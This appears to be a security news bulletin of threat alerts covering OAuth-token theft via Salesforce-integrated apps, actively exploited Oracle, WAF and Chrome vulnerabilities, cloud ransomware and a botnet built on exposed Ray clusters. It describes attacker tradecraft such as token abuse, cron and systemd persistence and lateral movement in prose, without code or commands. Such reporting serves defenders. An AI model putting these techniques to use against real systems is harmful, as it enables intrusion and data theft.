Threat Alerts

The Scattered Lapsus$ Hunters cybercrime group has executed a sophisticated supply chain attack targeting over 200 organizations through compromised OAuth tokens from Salesforce-integrated applications, specifically exploiting Gainsight and previously Salesloft Drift connections to steal sensitive corporate data.

In late November, Salesforce responded by revoking all active tokens associated with Gainsight applications and temporarily removing them from the AppExchange marketplace.. The attack campaign began in March 2025 when threat actors gained access to Salesloft’s GitHub repository, stealing OAuth authentication tokens that allowed them to bypass multi-factor authentication and masquerade as trusted applications. These stolen tokens provided unauthorized access to Salesforce instances, enabling lateral movement within cloud environments while evading traditional security controls. The attackers subsequently expanded their operations to target Gainsight, a customer success platform, maintaining persistent access for approximately three months before detection.

The threat actors utilized various VPN services and proxy networks to mask their activities, employing unusual user agent strings. The group’s persistent focus on OAuth token theft and third-party application vulnerabilities represents a significant shift in attack methodologies, exploiting the trust relationships between integrated cloud services rather than directly targeting primary platforms.

CISA has added a critical Oracle Fusion Middleware vulnerability to its Known Exploited Vulnerabilities catalog. CVE-2025-61757 (CVSS Score 9.8) represents a missing authentication flaw that enables complete system takeover through pre-authenticated remote code execution.

The vulnerability affects Oracle Identity Manager, allowing unauthenticated attackers with HTTP network access to compromise the REST WebServices component. The flaw requires no authentication and is easily exploitable, enabling attackers to achieve full system control through the Identity Manager interface. Honeypot analysis revealed active exploitation attempts between August and September 2025, with multiple HTTP POST requests targeting the vulnerable endpoint using 556-byte payloads. The attacks originated from different IP addresses but shared identical user agents, indicating coordinated exploitation efforts that preceded Oracle’s patch release.

A critical OS command injection vulnerability in web application firewall appliances, tracked as CVE-2025-58034, is currently being actively exploited, prompting urgent warnings from federal cybersecurity authorities. The flaw, classified as an OS command injection issue, allows authenticated attackers to execute unauthorized code on the underlying operating system, potentially resulting in full system compromise, data theft, and malicious software deployment. The exploit can be triggered through specially crafted HTTP requests or CLI commands, enabling attackers with initial access to bypass security controls, escalate privileges, and gain system-level execution. Its ability to grant direct access to critical system functions makes the vulnerability especially dangerous for enterprise security infrastructure.

Federal agencies have been given a seven-day deadline to apply patches under the known exploited vulnerabilities directive, highlighting the urgency of addressing this weakness. The vendor has released security updates and mitigation guidance, and organizations are strongly advised to apply these fixes immediately or discontinue use of affected appliances until proper security measures are in place. The ongoing exploitation of CVE-2025-58034 underscores the importance of timely patching, continuous monitoring of security advisories, and proactive risk management for critical enterprise systems.

Google has released an emergency Chrome update to address CVE-2025-13223 (CVSS 8.8), a zero-day vulnerability in the V8 JavaScript engine that is actively exploited in the wild. This type confusion flaw enables attackers to achieve heap corruption through malicious web pages.

CVE-2025-13223 represents a critical type confusion vulnerability within Chrome’s V8 engine, allowing remote attackers to exploit heap corruption by tricking users into visiting specially crafted HTML pages. The flaw can lead to unauthorized access to sensitive data and potential system compromise through drive-by attacks. Google’s Threat Analysis Group confirmed active exploitation, prompting the immediate out-of-band security release. The update also patches CVE-2025-13224 (CVSS 8.8), another type confusion vulnerability in V8 discovered through automated vulnerability research.

The patches are available in Chrome versions 142.0.7444.175/.176 for Windows, 142.0.7444.176 for macOS, and 142.0.7444.175 for Linux, with rollout occurring over the coming weeks. Type confusion vulnerabilities occur when programs incorrectly assume data types, leading to memory misinterpretation that attackers can leverage for arbitrary code execution. Other Chromium-based browsers including Microsoft Edge, Brave, and Opera are expected to receive these fixes soon. This incident continues the pattern of V8 engine vulnerabilities being actively exploited throughout 2025, demonstrating the ongoing targeting of this critical browser component.

A recent report warns of a shift in ransomware tactics, targeting cloud-native environments like Amazon S3. This evolution poses significant risks as attackers exploit cloud-specific vulnerabilities, leading to potential irreversible data destruction.

The report details five ransomware variants that exploit misconfigurations in cloud storage, such as leaked credentials and overly permissive policies. Attackers leverage native cloud features to encrypt or delete data, making recovery difficult. These tactics include using customer-provided keys or external key stores, which can result in permanent data loss if mismanaged. The common thread is the exploitation of misconfigured storage and stolen credentials, rather than inherent cloud service vulnerabilities.

The analysis concludes that the root cause of these vulnerabilities lies in cloud security missteps by users, not the cloud providers themselves. To mitigate these risks, organizations should ensure proper configuration of storage resources, implement strict access controls, and regularly audit their cloud environments for potential security gaps. Monitoring for unusual access patterns and securing IAM credentials are crucial steps in protecting against these advanced ransomware threats.

Security researchers have identified an active global hacking campaign that exploits CVE-2023-48022 in ShadowRay, an open-source AI framework widely used to power modern AI systems. The campaign, which appears to have been active since September 2024, has compromised Ray clusters across multiple continents, turning them into a self-propagating botnet capable of cryptojacking, DDoS attacks, and data exfiltration.

The attackers, operating under the name IronErn440, initially leveraged GitLab as their command-and-control infrastructure before migrating to GitHub after the first repository was taken down. The attack begins with reconnaissance using out-of-band application security testing platforms to identify vulnerable Ray dashboard APIs exposed to the internet. Once identified, attackers exploit the unauthenticated Ray Job Submission APIs to inject malicious payloads, which include LLM-generated code evidenced by characteristic docstrings and error handling patterns. The operation then uses Ray’s legitimate NodeAffinitySchedulingStrategy feature to spread laterally across every node in the cluster, effectively weaponizing the framework’s own orchestration capabilities.

Beyond cryptocurrency mining, the compromised infrastructure serves multiple malicious purposes. Attackers establish persistence through cron jobs running every 15 minutes, systemd services disguised as legitimate system components, and shell profile injections. They implement region-aware malware delivery, detecting victim geography to optimize payload distribution and bypass censorship in certain countries. The operation includes active competition elimination, where attackers deploy scripts to detect and terminate rival cryptocurrency miners while blocking competing mining pools through firewall rules and hosts file modifications. The campaign demonstrates DevOps-style sophistication, using version control platforms for real-time malware updates that propagate across the entire botnet within hours. Evidence shows attackers have accessed sensitive data including MySQL database credentials, proprietary AI models, source code, and cloud credentials from compromised systems, while also deploying DDoS tools targeting production websites and mining infrastructure, transforming the operation into a multi-purpose botnet with global autonomous propagation capabilities.